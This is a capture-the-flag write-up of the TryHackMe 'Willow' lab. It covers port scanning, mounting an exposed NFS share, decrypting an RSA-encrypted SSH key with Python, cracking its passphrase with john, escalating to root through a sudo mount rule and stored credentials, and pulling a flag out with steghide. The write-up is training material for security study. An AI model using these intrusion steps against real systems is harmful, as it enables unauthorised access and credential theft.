Willow — TryHackMe — WriteUp
Hello. I’m Rahmos. Here is my Willow — TryHackMe — WriteUp. Check it out!
First, deploy the machine and run nmap to find the open ports:
nmap -A -T4 -p- -v <ip>
There are 4 open ports: 22 (SSH), 80 (HTTP), 111 (RPC), and 2049 (NFS).
Since NFS is running, let's check which directories the server exports:
showmount -e <ip>
So /var/failsafe is exported to everyone (the * in the client column means any host can mount it). Let's mount this folder and see what's inside.
Follow these commands:
mkdir /tmp/willow
mount -t nfs 10.10.229.81:/var/failsafe /tmp/willow
Now cd to /tmp/willow to see what’s inside /var/failsafe:
And the content of “rsa_keys”:
Well, at this point I don't know what those numbers mean, so I'll just leave them for now.
Next, let’s access its website on port 80:
So many numbers here! It looks like an encoded string. I'll use CyberChef (http://icyberchef.com/) to decode it.
OK, the rest of the numbers are Willow's SSH private key, encrypted with RSA. From the hint, I know the key format is:
Public Key: (e, n)
Private Key: (d, n)
Looking back at "rsa_keys", I now know what e, d and n are:
e: 23
d: 61527
n: 37627
(A quick sanity check that these really belong together: 37627 = 191 x 197, so phi(n) = 190 x 196 = 37240, and 23 x 61527 = 1415121 = 38 x 37240 + 1, i.e. e and d are inverses mod phi(n). If the modulus were mistyped, that check would fail and every decrypted value would be garbage.)
Each number on the page is one RSA ciphertext block, and the formula to recover the plaintext is:
decrypted = c^d mod n
In Python that is pow(encrypted, d, n), not (encrypted ** d) % n: the three-argument pow does modular exponentiation and never builds the enormous intermediate value encrypted ** d, so it finishes instantly even for d = 61527.
So, let’s write some simple code using the format above to decrypt this RSA. You can find my code here.
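As an added example (this is not the author's linked script), here is the decryption step in Python, with the check a practitioner would want before trusting a hand-copied key pair. It uses the (e, d, n) values from "rsa_keys"; the ciphertext it decrypts is constructed inside the script by encrypting a sample string, because the page's own numbers are not reproduced in this write-up, and it assumes the page's ciphertext is one integer per character separated by whitespace (my assumption about the format).

```python
"""
Added example, not the original write-up's code: textbook-RSA decryption
with the key pair recovered from the NFS share, plus a consistency check.

Assumptions (not confirmed by the write-up): the web page's ciphertext is a
whitespace-separated list of integers, one per plaintext character, each
produced as c = m^e mod n. The ciphertext below is CONSTRUCTED from a sample
string so the script runs offline.
"""
from typing import List, Tuple

# Key material as recovered from /var/failsafe/rsa_keys
E, D, N = 23, 61527, 37627


def factor_small_n(n: int) -> Tuple[int, int]:
    """Trial division; fine for a 16-bit modulus like this one."""
    for p in range(2, int(n ** 0.5) + 1):
        if n % p == 0:
            return p, n // p
    raise ValueError("n has no small factor; not a toy RSA modulus")


def check_key_pair(e: int, d: int, n: int) -> bool:
    """True if e and d are inverses modulo phi(n) = (p-1)(q-1).

    This catches a mistyped modulus (a single transposed digit in n makes
    the check fail) before you waste time staring at garbage output.
    """
    p, q = factor_small_n(n)
    phi = (p - 1) * (q - 1)
    return (e * d) % phi == 1


def parse_ciphertext(blob: str) -> List[int]:
    """Turn the run of numbers copied from the page into integers."""
    return [int(tok) for tok in blob.split()]


def rsa_encrypt(plaintext: str, e: int, n: int) -> List[int]:
    """Per-character textbook RSA, mirroring how the challenge encrypts.

    Every character code must be smaller than n; all ASCII is, for this n.
    """
    return [pow(ord(ch), e, n) for ch in plaintext]


def rsa_decrypt(ciphertext: List[int], d: int, n: int) -> str:
    """m = c^d mod n via three-argument pow (no giant c ** d intermediate)."""
    return "".join(chr(pow(c, d, n)) for c in ciphertext)


if __name__ == "__main__":
    if not check_key_pair(E, D, N):
        raise SystemExit("e and d are not inverses mod phi(n); re-check rsa_keys")
    # Constructed sample: a PEM header line, encrypted with the public key
    sample = "-----BEGIN RSA PRIVATE KEY-----"
    blob = " ".join(str(c) for c in rsa_encrypt(sample, E, N))
    print(rsa_decrypt(parse_ciphertext(blob), D, N))
```

Against the real page you would paste the numbers from the site into the `blob` string and write the result to rsakey.txt; with the key pair from "rsa_keys" the `check_key_pair` test passes, and a modulus with two digits swapped (e.g. 37267) fails it, which is exactly the case where a simple `(c ** d) % n` loop would silently print nonsense.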
After running it, I got the private key:
Now crack the password of this key using john:
ssh2john rsakey.txt > johnrsa.txt
john --wordlist=rockyou.txt johnrsa.txt
John recovers the passphrase. Run chmod 600 rsakey.txt so that ssh accepts the key file, then log in over SSH with the private key and the passphrase above:
ssh -i rsakey.txt willow@<ip>
I’m in!
There is a "user.jpg" inside willow's home folder; it looks like the first flag. Transfer it to your machine with scp. From your machine:
scp -i rsakey.txt willow@10.10.229.81:/home/willow/user.jpg /home/<your-username>
The image will be your flag!
Now I’ll find a way to own root and get the final flag.
First, run sudo -l to see what willow is allowed to run with sudo:
willow can run mount /dev/* as root without a password. So let's see what's inside /dev:
There’s a “hidden_backup” file. Let’s mount it to willow home to see what’s inside:
mkdir /home/willow/hidden && sudo mount /dev/hidden_backup /home/willow/hidden
Well, there's a "creds.txt" file, and inside it is root's password! Run su root with this password and get the final flag!
Oh wait!! the root.txt is not the final flag!
Wait a minute, I haven't extracted anything from "user.jpg" yet, right? Maybe there's something hidden in there! Let's extract the hidden data using steghide:
steghide extract -sf user.jpg
When steghide asks for a passphrase, enter root's password and the hidden data is extracted. That file is your root flag.
The end.
HAPPY HACKING